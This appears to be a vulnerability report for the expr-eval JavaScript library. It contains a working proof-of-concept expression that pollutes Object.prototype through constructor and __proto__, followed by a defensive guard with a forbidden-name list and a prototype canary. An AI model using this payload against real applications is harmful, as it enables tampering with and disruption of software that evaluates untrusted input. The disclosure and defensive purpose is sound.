With specific input, attackers can define properties on a prototype, which leads to prototype pollution.
Requires Node version >= 12.0.0, which introduced Object.fromEntries.
// PoC.js
const { Parser } = require('expr-eval');
const o = {};
console.log("o.a=", o.a); // o.a= undefined
const res = Parser.evaluate('Object=constructor;a=Object.fromEntries([["a","polluted"]]);Object.assign(__proto__, a)');
console.log("o.a=", o.a); // o.a= polluted
This vulnerability can be used to cause prototype pollution.
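A caller-side guard for applications that pass untrusted expressions to an evaluator, as an added example that is not part of the original report or of expr-eval. All function and constant names are hypothetical, and the evaluator is passed in as a callback so the block runs without the library.

```javascript
// Added example: hypothetical names throughout, not expr-eval's own API.
const FORBIDDEN = ['__proto__', 'constructor', 'prototype'];
const PROTOS = [Object.prototype, Array.prototype, Function.prototype];
// The expression from the PoC above, used here only as filter input.
const POC_EXPRESSION = 'Object=constructor;a=Object.fromEntries([["a","polluted"]]);Object.assign(__proto__, a)';

// Conservative pre-filter: report forbidden names anywhere in the text,
// string literals included, because an evaluator may resolve them later.
function findForbiddenNames(expression) {
  const hits = new Set();
  for (const m of String(expression).matchAll(/[A-Za-z_$][A-Za-z0-9_$]*/g)) {
    if (FORBIDDEN.includes(m[0])) hits.add(m[0]);
  }
  return [...hits].sort();
}

// Run fn, then diff the built-in prototypes against a snapshot taken before.
// Keys that appeared are deleted again and reported. Overwritten existing
// keys are not detected by this check.
function runWithPollutionCanary(fn) {
  const before = PROTOS.map((p) => new Set(Reflect.ownKeys(p)));
  let result;
  let error = null;
  try { result = fn(); } catch (e) { error = e; }
  const added = [];
  PROTOS.forEach((proto, i) => {
    for (const key of Reflect.ownKeys(proto)) {
      if (!before[i].has(key)) {
        added.push(String(key));
        delete proto[key];
      }
    }
  });
  return { result, error, added };
}

// evaluate is whatever function the application uses to run an expression.
function guardedEvaluate(expression, evaluate) {
  const names = findForbiddenNames(expression);
  if (names.length > 0) return { ok: false, reason: 'forbidden names: ' + names.join(', ') };
  const { result, error, added } = runWithPollutionCanary(() => evaluate(expression));
  if (added.length > 0) return { ok: false, reason: 'prototype polluted: ' + added.join(', ') };
  if (error) return { ok: false, reason: 'evaluation error: ' + error.message };
  return { ok: true, result };
}
```

The canary also works on its own as a regression test around an evaluator call. Neither check replaces a fix in the evaluator itself.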